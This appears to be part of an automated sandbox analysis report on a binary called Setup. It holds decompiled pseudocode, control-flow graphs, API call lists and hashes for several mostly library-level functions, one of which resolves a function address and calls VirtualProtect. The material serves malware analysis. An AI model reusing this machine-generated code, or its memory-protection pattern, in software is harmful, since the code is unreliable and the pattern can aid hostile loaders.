                                                                                                                                                                                              0x00418d43
                                                                                                                                                                                              0x00418d43
                                                                                                                                                                                              0x00418e78
                                                                                                                                                                                              0x00418e81
                                                                                                                                                                                              0x00418e8b
                                                                                                                                                                                              0x00418e9a
                                                                                                                                                                                              0x00418e9f
                                                                                                                                                                                              0x00418ea8
                                                                                                                                                                                              0x00418eb6
                                                                                                                                                                                              0x00418ec5
                                                                                                                                                                                              0x00418ecb
                                                                                                                                                                                              0x00418ece
                                                                                                                                                                                              0x00418ed1
                                                                                                                                                                                              0x00418ed7
                                                                                                                                                                                              0x00418ee5
                                                                                                                                                                                              0x00418eee
                                                                                                                                                                                              0x00418ef4
                                                                                                                                                                                              0x00418f02
                                                                                                                                                                                              0x00418f0f
                                                                                                                                                                                              0x00418f12
                                                                                                                                                                                              0x00418f27
                                                                                                                                                                                              0x00418f3a
                                                                                                                                                                                              0x00418f4a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000080), ref: 00418F09
                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00424990), ref: 00418F21
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(00424990,?,00000040,00000000), ref: 00418F3A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                              • String ID: A$Q$Q
                                                                                                                                                                                              • API String ID: 2099061454-203127502
                                                                                                                                                                                              • Opcode ID: fd38d750fc941b57a52b3840ea497fe3cef62eab5519b14087e9a29d0883ac9b
                                                                                                                                                                                              • Instruction ID: de4aad0e28558ed54d02fa8eb39dd51dff82fcb00e1b616e1cc1a0ae7a607483
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd38d750fc941b57a52b3840ea497fe3cef62eab5519b14087e9a29d0883ac9b
                                                                                                                                                                                              • Instruction Fuzzy Hash: F2715E25C4D3ED89DB02C7F988542EDBFB05F6F201F08429AD4E3B62C6C1684A4E9B75
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040551D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 198 40551d-405525 199 405534-40553f call 40c3ef 198->199 202 405541-405542 199->202 203 405527-405532 call 40c4c8 199->203 203->199 206 405543-40554f 203->206 207 405551-405569 call 405502 call 407d9d 206->207 208 40556a-405581 call 402300 call 4052cb 206->208 207->208
                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E0040551D(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v0;
				char _v16;
				void* _t17;
				signed int _t18;
				intOrPtr* _t23;
				intOrPtr _t25;
				intOrPtr* _t26;
				void* _t30;
				intOrPtr _t34;
				void* _t37;
				void* _t38;
				signed int _t42;
				intOrPtr _t43;
				void* _t47;

				_t38 = __edi;
				_t37 = __edx;
				_t30 = __ebx;
				while(1) {
					_t17 = E0040C3EF(_t30, _t37, _t38, _a4); // executed
					if(_t17 != 0) {
						break;
					}
					_t18 = E0040C4C8(_a4);
					__eflags = _t18;
					if(_t18 == 0) {
						__eflags = L"eDescription" & 0x00000001;
						if((L"eDescription" & 0x00000001) == 0) {
							L"eDescription" = L"eDescription" | 0x00000001;
							__eflags = L"eDescription";
							E00405502(0x455f3c);
							E00407D9D(L"eDescription", 0x417cfb);
						}
						_t5 =  &_v16; // 0x402223
						E00402300(_t5, 0x455f3c);
						_t6 =  &_v16; // 0x402223
						E004052CB(_t6, 0x428078);
						asm("int3");
						_push(0x455f3c);
						_t42 = _v0;
						_push(_t38);
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags = _v0;
							if(__eflags != 0) {
								__eflags = _a8;
								if(_a8 == 0) {
									L15:
									E00406D10(0, _v0, 0, _a4);
									_t47 = _t47 + 0xc;
									__eflags = _a8;
									if(__eflags == 0) {
										goto L10;
									} else {
										__eflags = _a4 - _t42;
										if(__eflags >= 0) {
											_t25 = 0x16;
										} else {
											_t26 = E0040A982(__eflags);
											_t34 = 0x22;
											 *_t26 = _t34;
											_t43 = _t34;
											goto L11;
										}
									}
								} else {
									__eflags = _a4 - _t42;
									if(_a4 < _t42) {
										goto L15;
									} else {
										E00404970(_t30, 0, _t42, _v0, _a8, _t42);
										goto L8;
									}
								}
							} else {
								L10:
								_t23 = E0040A982(__eflags);
								_t43 = 0x16;
								 *_t23 = _t43;
								L11:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E004051FD(_t37, 0, _t43);
								_t25 = _t43;
							}
						} else {
							L8:
							_t25 = 0;
						}
						return _t25;
					} else {
						continue;
					}
					L20:
				}
				return _t17;
				goto L20;
			}

















                                                                                                                                                                                              0x0040551d
                                                                                                                                                                                              0x0040551d
                                                                                                                                                                                              0x0040551d
                                                                                                                                                                                              0x00405534
                                                                                                                                                                                              0x00405537
                                                                                                                                                                                              0x0040553f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040552a
                                                                                                                                                                                              0x00405530
                                                                                                                                                                                              0x00405532
                                                                                                                                                                                              0x00405543
                                                                                                                                                                                              0x0040554f
                                                                                                                                                                                              0x00405551
                                                                                                                                                                                              0x00405551
                                                                                                                                                                                              0x0040555a
                                                                                                                                                                                              0x00405564
                                                                                                                                                                                              0x00405569
                                                                                                                                                                                              0x0040556b
                                                                                                                                                                                              0x0040556e
                                                                                                                                                                                              0x00405578
                                                                                                                                                                                              0x0040557c
                                                                                                                                                                                              0x00405581
                                                                                                                                                                                              0x00405587
                                                                                                                                                                                              0x00405588
                                                                                                                                                                                              0x0040558b
                                                                                                                                                                                              0x0040558e
                                                                                                                                                                                              0x00405590
                                                                                                                                                                                              0x00405596
                                                                                                                                                                                              0x00405599
                                                                                                                                                                                              0x004055b6
                                                                                                                                                                                              0x004055b9
                                                                                                                                                                                              0x004055d1
                                                                                                                                                                                              0x004055d8
                                                                                                                                                                                              0x004055dd
                                                                                                                                                                                              0x004055e0
                                                                                                                                                                                              0x004055e3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004055e5
                                                                                                                                                                                              0x004055e5
                                                                                                                                                                                              0x004055e8
                                                                                                                                                                                              0x004055fa
                                                                                                                                                                                              0x004055ea
                                                                                                                                                                                              0x004055ea
                                                                                                                                                                                              0x004055f1
                                                                                                                                                                                              0x004055f2
                                                                                                                                                                                              0x004055f4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004055f4
                                                                                                                                                                                              0x004055e8
                                                                                                                                                                                              0x004055bb
                                                                                                                                                                                              0x004055bb
                                                                                                                                                                                              0x004055be
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004055c0
                                                                                                                                                                                              0x004055c7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004055cc
                                                                                                                                                                                              0x004055be
                                                                                                                                                                                              0x0040559b
                                                                                                                                                                                              0x0040559b
                                                                                                                                                                                              0x0040559b
                                                                                                                                                                                              0x004055a2
                                                                                                                                                                                              0x004055a3
                                                                                                                                                                                              0x004055a5
                                                                                                                                                                                              0x004055a5
                                                                                                                                                                                              0x004055a6
                                                                                                                                                                                              0x004055a7
                                                                                                                                                                                              0x004055a8
                                                                                                                                                                                              0x004055a9
                                                                                                                                                                                              0x004055aa
                                                                                                                                                                                              0x004055b2
                                                                                                                                                                                              0x004055b2
                                                                                                                                                                                              0x00405592
                                                                                                                                                                                              0x00405592
                                                                                                                                                                                              0x00405592
                                                                                                                                                                                              0x00405592
                                                                                                                                                                                              0x004055fe
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00405532
                                                                                                                                                                                              0x00405542
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _malloc.LIBCMT ref: 00405537
                                                                                                                                                                                                • Part of subcall function 0040C3EF: __FF_MSGBANNER.LIBCMT ref: 0040C412
                                                                                                                                                                                                • Part of subcall function 0040C3EF: __NMSG_WRITE.LIBCMT ref: 0040C419
                                                                                                                                                                                                • Part of subcall function 0040C3EF: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0040A872,00000010,00000001,00000010,?,0040C626,00000018,00428830,0000000C,0040C6B7), ref: 0040C466
                                                                                                                                                                                              • std::bad_exception::bad_exception.LIBCMTD ref: 0040556E
                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040557C
                                                                                                                                                                                                • Part of subcall function 00405502: std::exception::exception.LIBCMT ref: 0040550E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                              • String ID: #"@$<_E
                                                                                                                                                                                              • API String ID: 2138351685-1209716754
                                                                                                                                                                                              • Opcode ID: 90e58e278f52f5e9d29c5514ba54b2876d67826c5f4d2c6e08979d588ae7a5eb
                                                                                                                                                                                              • Instruction ID: fb2ae312c09ec53a36a5feb7ecd5fa2a91587b675c9b01a6d35c3dbcae153c49
                                                                                                                                                                                              • Opcode Fuzzy Hash: 90e58e278f52f5e9d29c5514ba54b2876d67826c5f4d2c6e08979d588ae7a5eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: B8F05E36A00A05B2CB14A761FC5AA6E3B699F4035CB64407FAC01750E6DF7C9A858A9D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00403244 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 217 403244-403258 call 40712d 220 403264-40326d 217->220 221 40325a 217->221 222 40328c-403291 220->222 223 40326f-403278 220->223 224 40325c-403261 call 407177 221->224 227 403293-403296 222->227 228 403298-40329b 222->228 223->222 226 40327a-403286 223->226 230 403288-40328a 226->230 227->224 231 4032ac-4032f1 call 4025f0 call 402f73 call 40297b call 402f73 call 40297b 228->231 232 40329d-40329f call 402d7b 228->232 230->224 246 40339e-4033ba 231->246 235 4032a4-4032a8 232->235 235->227 238 4032aa 235->238 238->230 248 4033c0 246->248 249 4032f6-4032f9 246->249 250 4033d8 248->250 251 4033c2-4033c5 249->251 252 4032ff-403317 call 402f73 call 40297b 249->252 255 4033db-4033e7 call 4011c0 250->255 251->250 253 4033c7-4033d6 call 402d7b 251->253 264 403343-40334d 252->264 265 403319-40333d call 402f73 call 40297b call 40793f 252->265 253->250 262 4033ee-4033f1 253->262 255->262 262->255 264->262 266 403353-403355 264->266 265->250 265->264 269 403357-40335b 266->269 270 403369-40339c call 402f73 call 40297b call 402f73 call 40297b 266->270 269->250 272 40335d-403364 call 402000 269->272 270->246 272->270
                                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                                              			E00403244(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t50;
				void* _t54;
				intOrPtr _t57;
				intOrPtr* _t59;
				intOrPtr* _t63;
				void* _t76;
				void* _t77;
				intOrPtr* _t80;
				char* _t81;
				char _t84;
				intOrPtr* _t87;
				intOrPtr* _t118;
				intOrPtr* _t123;
				void* _t124;
				void* _t125;

				_push(0x54);
				E0040712D(E00417902, __ebx, __edi, __esi);
				_t84 =  *((intOrPtr*)(_t124 + 8));
				_t123 = __ecx;
				if(_t84 != 0xffffffff) {
					_t87 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x24))));
					_t118 = 0;
					__eflags = _t87;
					if(_t87 == 0) {
						L7:
						_t50 =  *((intOrPtr*)(_t123 + 0x4c));
						__eflags = _t50 - _t118;
						if(_t50 != _t118) {
							__eflags =  *((intOrPtr*)(_t123 + 0x3c)) - _t118;
							if(__eflags != 0) {
								 *((char*)(_t124 - 0x30)) = _t84;
								E004025F0(_t84, _t124 - 0x2c, _t118, _t123, 8, _t118);
								 *((intOrPtr*)(_t124 - 4)) = _t118;
								_t54 = E0040297B(E00402F73(_t124 - 0x2c, _t124 - 0x48));
								_t57 = E0040297B(E00402F73(_t124 - 0x2c, _t124 - 0x50));
								_t118 =  *((intOrPtr*)(_t124 - 0x18)) + _t54;
								_push(_t124 - 0x38);
								_t84 = _t123 + 0x44;
								while(1) {
									_t112 = _t124 - 0x30;
									 *((intOrPtr*)(_t124 - 0x34)) = _t57;
									_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x3c)))) + 0x14))(_t84, _t124 - 0x30, _t124 - 0x2f, _t124 - 0x3c, _t57, _t118);
									__eflags = _t59;
									if(_t59 < 0) {
										break;
									}
									__eflags = _t59 - 1;
									if(_t59 > 1) {
										__eflags = _t59 - 3;
										if(__eflags != 0) {
											goto L25;
										} else {
											_t63 = E00402D7B(__eflags,  *((intOrPtr*)(_t124 - 0x30)),  *((intOrPtr*)(_t123 + 0x4c)));
											__eflags = _t63;
											if(_t63 != 0) {
												goto L27;
											} else {
												goto L25;
											}
										}
									} else {
										_t118 =  *((intOrPtr*)(_t124 - 0x38)) - E0040297B(E00402F73(_t124 - 0x2c, _t124 - 0x58));
										__eflags = _t118;
										if(_t118 == 0) {
											L16:
											 *((char*)(_t123 + 0x41)) = 1;
											__eflags =  *((intOrPtr*)(_t124 - 0x3c)) - _t124 - 0x30;
											if( *((intOrPtr*)(_t124 - 0x3c)) != _t124 - 0x30) {
												L27:
												_t123 =  *((intOrPtr*)(_t124 + 8));
											} else {
												__eflags = _t118;
												if(_t118 > 0) {
													L20:
													 *((intOrPtr*)(_t124 - 0x40)) = E0040297B(E00402F73(_t124 - 0x2c, _t124 - 0x48));
													_t57 = E0040297B(E00402F73(_t124 - 0x2c, _t124 - 0x50));
													_push(_t124 - 0x38);
													_t118 =  *((intOrPtr*)(_t124 - 0x18)) +  *((intOrPtr*)(_t124 - 0x40));
													__eflags = _t118;
													continue;
												} else {
													__eflags =  *((intOrPtr*)(_t124 - 0x18)) - 0x20;
													if( *((intOrPtr*)(_t124 - 0x18)) >= 0x20) {
														goto L25;
													} else {
														E00402000(_t84, _t124 - 0x2c, _t118, _t123, 8, 0);
														goto L20;
													}
												}
											}
										} else {
											_t76 = E0040297B(E00402F73(_t124 - 0x2c, _t124 - 0x60));
											_push( *((intOrPtr*)(_t123 + 0x4c)));
											_push(_t118);
											_push(1);
											_push(_t76);
											_t77 = E0040793F(_t84, _t112, _t118, _t123, __eflags);
											_t125 = _t125 + 0x10;
											__eflags = _t118 - _t77;
											if(_t118 != _t77) {
												L25:
												__eflags = _t123;
											} else {
												goto L16;
											}
										}
									}
									E004011C0(_t124 - 0x2c, 1, 0);
									goto L2;
								}
								goto L25;
							} else {
								_t50 = E00402D7B(__eflags, _t84, _t50); // executed
								__eflags = _t50;
								if(_t50 == 0) {
									goto L8;
								} else {
									goto L6;
								}
							}
						} else {
							L8:
						}
					} else {
						_t80 =  *((intOrPtr*)(__ecx + 0x34));
						__eflags = _t87 -  *_t80 + _t87;
						if(_t87 >=  *_t80 + _t87) {
							goto L7;
						} else {
							 *_t80 =  *_t80 - 1;
							__eflags =  *_t80;
							_t123 =  *((intOrPtr*)(__ecx + 0x24));
							_t81 =  *_t123;
							 *_t123 = _t81 + 1;
							 *_t81 = _t84;
							L6:
						}
					}
				} else {
				}
				L2:
				return E00407177(_t84, _t118, _t123);
			}


















                                                                                                                                                                                              0x00403244
                                                                                                                                                                                              0x0040324b
                                                                                                                                                                                              0x00403250
                                                                                                                                                                                              0x00403253
                                                                                                                                                                                              0x00403258
                                                                                                                                                                                              0x00403267
                                                                                                                                                                                              0x00403269
                                                                                                                                                                                              0x0040326b
                                                                                                                                                                                              0x0040326d
                                                                                                                                                                                              0x0040328c
                                                                                                                                                                                              0x0040328c
                                                                                                                                                                                              0x0040328f
                                                                                                                                                                                              0x00403291
                                                                                                                                                                                              0x00403298
                                                                                                                                                                                              0x0040329b
                                                                                                                                                                                              0x004032b2
                                                                                                                                                                                              0x004032b5
                                                                                                                                                                                              0x004032c1
                                                                                                                                                                                              0x004032cb
                                                                                                                                                                                              0x004032e3
                                                                                                                                                                                              0x004032eb
                                                                                                                                                                                              0x004032ed
                                                                                                                                                                                              0x004032ee
                                                                                                                                                                                              0x0040339e
                                                                                                                                                                                              0x004033ab
                                                                                                                                                                                              0x004033af
                                                                                                                                                                                              0x004033b5
                                                                                                                                                                                              0x004033b8
                                                                                                                                                                                              0x004033ba
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004032f6
                                                                                                                                                                                              0x004032f9
                                                                                                                                                                                              0x004033c2
                                                                                                                                                                                              0x004033c5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004033c7
                                                                                                                                                                                              0x004033cd
                                                                                                                                                                                              0x004033d4
                                                                                                                                                                                              0x004033d6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004033d6
                                                                                                                                                                                              0x004032ff
                                                                                                                                                                                              0x00403315
                                                                                                                                                                                              0x00403315
                                                                                                                                                                                              0x00403317
                                                                                                                                                                                              0x00403343
                                                                                                                                                                                              0x00403346
                                                                                                                                                                                              0x0040334a
                                                                                                                                                                                              0x0040334d
                                                                                                                                                                                              0x004033ee
                                                                                                                                                                                              0x004033ee
                                                                                                                                                                                              0x00403353
                                                                                                                                                                                              0x00403353
                                                                                                                                                                                              0x00403355
                                                                                                                                                                                              0x00403369
                                                                                                                                                                                              0x0040337f
                                                                                                                                                                                              0x00403390
                                                                                                                                                                                              0x00403398
                                                                                                                                                                                              0x0040339c
                                                                                                                                                                                              0x0040339c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00403357
                                                                                                                                                                                              0x00403357
                                                                                                                                                                                              0x0040335b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040335d
                                                                                                                                                                                              0x00403364
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00403364
                                                                                                                                                                                              0x0040335b
                                                                                                                                                                                              0x00403355
                                                                                                                                                                                              0x00403319
                                                                                                                                                                                              0x00403327
                                                                                                                                                                                              0x0040332c
                                                                                                                                                                                              0x0040332f
                                                                                                                                                                                              0x00403330
                                                                                                                                                                                              0x00403332
                                                                                                                                                                                              0x00403333
                                                                                                                                                                                              0x00403338
                                                                                                                                                                                              0x0040333b
                                                                                                                                                                                              0x0040333d
                                                                                                                                                                                              0x004033d8
                                                                                                                                                                                              0x004033d8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040333d
                                                                                                                                                                                              0x00403317
                                                                                                                                                                                              0x004033e2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004033e7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040329d
                                                                                                                                                                                              0x0040329f
                                                                                                                                                                                              0x004032a6
                                                                                                                                                                                              0x004032a8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004032aa
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004032aa
                                                                                                                                                                                              0x004032a8
                                                                                                                                                                                              0x00403293
                                                                                                                                                                                              0x00403293
                                                                                                                                                                                              0x00403293
                                                                                                                                                                                              0x0040326f
                                                                                                                                                                                              0x0040326f
                                                                                                                                                                                              0x00403276
                                                                                                                                                                                              0x00403278
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040327a
                                                                                                                                                                                              0x0040327a
                                                                                                                                                                                              0x0040327a
                                                                                                                                                                                              0x0040327c
                                                                                                                                                                                              0x0040327f
                                                                                                                                                                                              0x00403284
                                                                                                                                                                                              0x00403286
                                                                                                                                                                                              0x00403288
                                                                                                                                                                                              0x00403288
                                                                                                                                                                                              0x00403278
                                                                                                                                                                                              0x0040325a
                                                                                                                                                                                              0x0040325a
                                                                                                                                                                                              0x0040325c
                                                                                                                                                                                              0x00403261

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Fputc$H_prolog3_
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2569218679-3916222277
                                                                                                                                                                                              • Opcode ID: 8f1e3d0a94b2d47a40b72c540845abdd662966f09118b599b24acc5571a80dd2
                                                                                                                                                                                              • Instruction ID: 9fc6fb7bfc272b9ba9af2fe0301312096d37dde493fcf1aae483470211d1f95a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f1e3d0a94b2d47a40b72c540845abdd662966f09118b599b24acc5571a80dd2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 71519371A042049BCF14DFA5D895DDEBBB9AF44304F10457FE512B72D1EB78AA04CB58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00402F97 Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 285 402f97-402fac call 40712d 288 402fd6-402fdb 285->288 289 402fae-402fbc 285->289 291 402fe2-402fe6 288->291 292 402fdd-402fe0 288->292 289->288 290 402fbe-402fcd 289->290 293 402fd0-402fd5 call 407177 290->293 294 402fe8-402fed call 402d5b 291->294 295 402ffe-40300a call 401000 291->295 292->293 299 402ff2-402ff6 294->299 303 4030d1-4030dd call 407186 295->303 299->292 302 402ff8-402ffc 299->302 302->293 306 4030e3 303->306 307 40300f-40306c call 402000 call 402f73 call 40297b call 402f73 call 40297b 303->307 309 4030e6-4030f2 call 4011c0 306->309 307->306 331 40306e-403073 307->331 316 4030f9-403111 call 402f73 call 40297b 309->316 326 403126-403128 316->326 327 403113-403125 call 407487 326->327 328 40312a-40312e 326->328 327->326 328->309 333 403075-403078 331->333 334 4030a6-4030af 331->334 333->306 336 40307a-40307d 333->336 334->316 335 4030b1-4030cc call 402f73 call 40297b call 401720 334->335 335->303 336->303 338 40307f-4030a1 call 402f73 call 40297b call 405582 336->338 338->328
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E00402F97(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
				signed int _t52;
				void* _t54;
				void* _t58;
				intOrPtr _t61;
				signed int _t67;
				void* _t106;
				void* _t130;

				_t123 = __edi;
				_t122 = __edx;
				_t95 = __ebx;
				_push(0x58);
				E0040712D(E004178A8, __ebx, __edi, __esi);
				_t129 = __ecx;
				if( *( *(__ecx + 0x20)) == 0 ||  *( *(__ecx + 0x20)) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *( *(__ecx + 0x20))) {
					_t52 =  *(_t129 + 0x4c);
					__eflags = _t52;
					if(_t52 != 0) {
						__eflags =  *(_t129 + 0x3c);
						if(__eflags != 0) {
							E00401000(_t130 - 0x2c);
							 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
							while(1) {
								_push( *(_t129 + 0x4c));
								_t54 = E00407186(_t95, _t122, _t123, _t129, __eflags);
								__eflags = _t54 - 0xffffffff;
								if(_t54 == 0xffffffff) {
									break;
								}
								E00402000(_t95, _t130 - 0x2c, _t123, _t129, 1, _t54);
								_t58 = E0040297B(E00402F73(_t130 - 0x2c, _t130 - 0x44));
								_t95 = _t58;
								_t61 = E0040297B(E00402F73(_t130 - 0x2c, _t130 - 0x64));
								_t122 =  *( *(_t129 + 0x3c));
								 *((intOrPtr*)(_t130 - 0x38)) = _t61;
								_t123 =  *((intOrPtr*)(_t130 - 0x18)) + _t58;
								_t67 =  *((intOrPtr*)( *( *(_t129 + 0x3c)) + 0x10))(_t129 + 0x44,  *((intOrPtr*)(_t130 - 0x38)),  *((intOrPtr*)(_t130 - 0x18)) + _t58, _t130 - 0x34, _t130 - 0x2d, _t130 - 0x2c, _t130 - 0x3c);
								__eflags = _t67;
								if(_t67 < 0) {
									break;
								} else {
									_t123 = 1;
									__eflags = _t67 - 1;
									if(_t67 <= 1) {
										_t106 = _t130 - 0x2c;
										__eflags =  *((intOrPtr*)(_t130 - 0x3c)) - _t130 - 0x2d;
										if( *((intOrPtr*)(_t130 - 0x3c)) != _t130 - 0x2d) {
											_t123 =  *((intOrPtr*)(_t130 - 0x18)) -  *((intOrPtr*)(_t130 - 0x34)) + E0040297B(E00402F73(_t106, _t130 - 0x54));
											while(1) {
												__eflags = _t123;
												if(_t123 <= 0) {
													goto L23;
												}
												_push( *(_t129 + 0x4c));
												_t123 = _t123 - 1;
												__eflags = _t123;
												_push( *((char*)(_t123 +  *((intOrPtr*)(_t130 - 0x34)))));
												E00407487(_t95, _t122, _t123, _t129, _t123);
											}
											goto L23;
										} else {
											__eflags =  *((intOrPtr*)(_t130 - 0x34)) - E0040297B(E00402F73(_t106, _t130 - 0x5c));
											E00401720(_t95, _t130 - 0x2c, 1, _t129, 0,  *((intOrPtr*)(_t130 - 0x34)) - E0040297B(E00402F73(_t106, _t130 - 0x5c)));
											continue;
										}
									} else {
										__eflags = _t67 - 3;
										if(_t67 != 3) {
											break;
										} else {
											__eflags =  *((intOrPtr*)(_t130 - 0x18)) - 1;
											if(__eflags < 0) {
												continue;
											} else {
												E00405582(_t95, _t83, _t130 - 0x2d, 1, E0040297B(E00402F73(_t130 - 0x2c, _t130 - 0x4c)), 1);
												L23:
												_t129 =  *(_t130 - 0x2d) & 0x000000ff;
											}
										}
									}
								}
								L19:
								E004011C0(_t130 - 0x2c, 1, 0);
								goto L3;
							}
							__eflags = _t129;
							goto L19;
						} else {
							_t52 = E00402D5B(__eflags, _t130 - 0x2d, _t52); // executed
							__eflags = _t52;
							if(_t52 == 0) {
								goto L5;
							} else {
							}
						}
					} else {
						L5:
					}
				} else {
					 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
					_t129 =  *(__ecx + 0x20);
					 *( *(__ecx + 0x20)) =  *( *(__ecx + 0x20)) + 1;
				}
				L3:
				return E00407177(_t95, _t123, _t129);
			}










                                                                                                                                                                                              0x00402f97
